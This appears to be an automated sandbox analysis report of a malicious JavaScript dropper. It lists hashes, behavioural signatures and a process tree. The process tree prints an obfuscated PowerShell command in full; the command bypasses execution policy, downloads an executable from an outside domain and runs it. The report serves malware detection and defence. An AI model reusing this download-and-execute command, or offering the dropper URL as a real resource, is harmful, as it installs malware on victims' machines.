Analysis

max time kernel: 243s
max time network: 245s
platform: windows7_x64
resource: win7v20210408
submitted: 28-06-2021 16:28

Static task: static1
Behavioral task: behavioral1
Sample: CFDI 1675442 76821.js
Resource: win7v20210408
0 signatures
0 seconds
General

Target: CFDI 1675442 76821.js
Size: 34KB
MD5: fef5d85788af40d874612dab6910f000
SHA1: e0510f670e82ccfd1f6d74e925fbe170c7625846
SHA256: 4faf4fbb399a98cf3eb551a943f42bec7195287b9cb1deb11e5bd32c25d53264
SHA512: d976685412bb31a22498294ad85672dca337a2f579c68771310713a2e3ac3a34a5f62885a48a1499ab743ad653072e737b517a2b6ae17c32b95b994c788762d2
Score: 10/10
Malware Config

Extracted
Language: ps1
Deobfuscated
URLs:
exe.dropper: https://saltoune.xyz/pb/aa.exe
Signatures

- Blocklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow  pid   Process
  7     1608  powershell.exe

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes: powershell.exe
  pid   Process
  1608  powershell.exe
  1608  powershell.exe

- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description              pid   Process
  Token: SeDebugPrivilege  1608  powershell.exe

- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes: wscript.exe, cmd.exe
  description                   pid   Process      procid_target
  PID 1632 wrote to memory of 1376  1632  wscript.exe  29
  PID 1632 wrote to memory of 1376  1632  wscript.exe  29
  PID 1632 wrote to memory of 1376  1632  wscript.exe  29
  PID 1376 wrote to memory of 1608  1376  cmd.exe      31
  PID 1376 wrote to memory of 1608  1376  cmd.exe      31
  PID 1376 wrote to memory of 1608  1376  cmd.exe      31
Processes

[1] C:\Windows\system32\wscript.exe
    Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\CFDI 1675442 76821.js
    - Suspicious use of WriteProcessMemory
    PID: 1632

    [2] C:\Windows\System32\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','%temp%kmt12.exe'); & %temp%kmt12.exe & UMkKSOqCracTlJx
        - Suspicious use of WriteProcessMemory
        PID: 1376

        [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('https://saltoune.xyz/pb/aa.exe','C:\Users\Admin\AppData\Local\Tempkmt12.exe');
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            PID: 1608